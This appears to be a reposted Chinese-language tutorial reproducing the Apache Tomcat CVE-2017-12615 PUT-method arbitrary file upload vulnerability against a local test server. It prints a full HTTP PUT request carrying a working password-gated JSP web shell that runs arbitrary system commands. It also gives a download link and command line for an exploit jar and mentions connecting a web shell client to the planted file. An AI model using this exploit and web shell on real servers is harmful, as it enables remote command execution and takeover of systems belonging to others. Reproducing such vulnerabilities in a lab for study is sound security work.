Tomcat PUT方法任意文件上傳(CVE-2017-12615)


目錄

漏洞復現:

漏洞利用工具:


漏洞環境當 Tomcat運行在Windows操作系統,且啟用了HTTP PUT請求方法(例如,將 readonly 初始化參數由默認值設置為 false),攻擊者將有可能可通過精心構造的攻擊請求上傳任意文件,包括JSP類型的木馬。
影響范圍Apache Tomcat 7.0.0 - 7.0.81

漏洞復現:

Tomcat版本:Tomcat 7.0.39

打開Tomcat安裝目錄的 conf\web.xml ,添加如下配置。在Tomcat7.0版本下默認配置是開啟readonly的,需要手動配置readonly為false才可以進行漏洞利用。

抓包,修改方式為OPTIONS,發現允許PUT方法

將數據包修改為如下,點擊 Go (我們可以將PUT的內容修改為其他類型的JSP木馬)

PUT /test.jsp/ HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 423

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

訪問網站根目錄下的test.jsp

漏洞利用工具:

https://download.csdn.net/download/qq_36119192/11665567

java -jar CVE-2017-12615-Exploit.jar http://127.0.0.1:8080/ test.jsp 木馬文件的路徑

然后,用冰蠍連接 http://127.0.0.1:8080/test.jsp 即可。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM